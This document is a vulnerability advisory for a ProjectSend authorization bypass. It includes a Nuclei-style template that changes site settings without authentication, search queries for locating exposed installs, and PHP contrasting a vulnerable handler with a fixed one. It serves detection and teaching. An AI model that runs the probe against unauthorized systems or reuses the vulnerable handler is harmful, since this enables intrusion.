An improper authorization check was identified within ProjectSend version r1605 that allows an attacker to perform sensitive actions such as enabling user registration and auto validation, or adding new entries to the whitelist of allowed extensions for uploaded files. Ultimately, this allows an attacker to execute arbitrary PHP code on the server hosting the application.
PoC code [publicly available]
id: CVE-2024-11680

info:
  name: ProjectSend <= r1605 - Improper Authorization
  author: DhiyaneshDK
  severity: critical
  description: |
    An improper authorization check was identified within ProjectSend version r1605 that allows an attacker to perform sensitive actions such as enabling user registration and auto validation, or adding new entries in the whitelist of allowed extensions for uploaded files. Ultimately, this allows to execute arbitrary PHP code on the server hosting the application.
  reference:
    - https://www.projectsend.org/
    - https://www.synacktiv.com/sites/default/files/2024-07/synacktiv-projectsend-multiple-vulnerabilities.pdf
    - https://vulncheck.com/advisories/projectsend-bypass
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-11680
    cwe-id: CWE-287,CWE-863
    epss-score: 0.93609
    epss-percentile: 0.99835
    cpe: cpe:2.3:a:projectsend:projectsend:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: projectsend
    product: projectsend
    shodan-query:
      - http.html:"projectsend"
      - http.html:"projectsend setup"
      - http.html:"provided by projectsend"
    fofa-query:
      - body="projectsend"
      - body="projectsend setup"
      - body=provided by projectsend
    google-query: intext:provided by projectsend
  tags: cve,cve2024,projectsend,auth-bypass,intrusive,kev,vkev

variables:
  string: "{{randstr}}"

flow: http(1) && http(2) && http(3) && http(4) && http(5)

http:
  # 1. Fingerprint the login page and harvest the CSRF token and the current site title.
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "projectsend")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: csrf
        group: 1
        regex:
          - 'name="csrf_token" value="([0-9a-z]+)"'
        internal: true

      - type: regex
        name: title
        group: 1
        regex:
          - '<title>Log in » ([0-9a-zA-Z]+)<\/title>'
        internal: true

  # 2. Unauthenticated POST to options.php changing the install title (the "&section" parameter had been mangled to "§ion" by extraction and is restored here).
  - raw:
      - |
        POST /options.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrf_token={{csrf}}&section=general&this_install_title={{string}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 500'
          - 'contains(content_type, "text/html")'
        condition: and
        internal: true

  # 3. Confirm the title change took effect.
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "{{string}}")'
        condition: and
        internal: true

  # 4. Restore the original title.
  - raw:
      - |
        POST /options.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrf_token={{csrf}}&section=general&this_install_title={{title}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 500'
          - 'contains(content_type, "text/html")'
        condition: and
        internal: true

  # 5. Verify the restore succeeded.
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "{{title}}")'
        condition: and
# digest: 4b0a00483046022100c53d4e24f363b3dabf15720b1dca52192d6ec57a968d151fcbc2cfad3c5d7e5b02210088727ed40af8428cbafc1bb8d245f43ca473022a0da95d3a867231a1f03c0620:922c64590222798bb761d5b6d8e72950
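As an added illustration (not ProjectSend's code and not part of the template above): the shape of bug the template probes is a settings handler that treats a CSRF token, issued to anonymous visitors on the login page, as its only gate, next to the hardened form that requires an authenticated administrator session before anything else. Function names, session fields and the request values are hypothetical.

```php
<?php
// Hypothetical illustration, not ProjectSend's code. All names are invented.

// BEFORE: the CSRF token is the only thing checked. Because the token is
// rendered on the public login page, an unauthenticated client can fetch it
// and submit the form, which is the CWE-863 (incorrect authorization) pattern.
function handle_options_vulnerable(array $post, array $session): string
{
    if (!hash_equals($session['csrf_token'] ?? '', $post['csrf_token'] ?? '')) {
        http_response_code(403);
        return 'csrf-rejected';
    }
    // No check that the caller is a logged-in administrator.
    return save_settings($post);
}

// AFTER: authenticate and authorize first, then verify CSRF, then restrict
// which settings sections this endpoint may write. Every branch fails closed.
function handle_options_fixed(array $post, array $session): string
{
    if (empty($session['user_id']) || ($session['role'] ?? '') !== 'admin') {
        http_response_code(403);
        return 'forbidden';
    }
    if (!hash_equals($session['csrf_token'] ?? '', $post['csrf_token'] ?? '')) {
        http_response_code(403);
        return 'csrf-rejected';
    }
    // Allow-list the writable sections so a general-settings form cannot be
    // repurposed to flip registration or the upload extension whitelist.
    if (!in_array($post['section'] ?? '', ['general'], true)) {
        http_response_code(400);
        return 'bad-section';
    }
    return save_settings($post);
}

// Placeholder for the persistence layer; returns what would be written.
function save_settings(array $post): string
{
    return 'saved:' . ($post['section'] ?? '') . ':' . ($post['this_install_title'] ?? '');
}

// Constructed request mirroring step 2 of the template: a token scraped from
// the login page plus a title change, with no authenticated user in the session.
$post = ['csrf_token' => 'abc123', 'section' => 'general', 'this_install_title' => 'x'];
$anonymous = ['csrf_token' => 'abc123'];
echo handle_options_vulnerable($post, $anonymous), "\n";
echo handle_options_fixed($post, $anonymous), "\n";
```

The first call succeeds with no authenticated user, the second is refused before the token is even examined; the same ordering (authenticate, authorize, then CSRF) is what makes the probe's 500-then-title-change signature disappear.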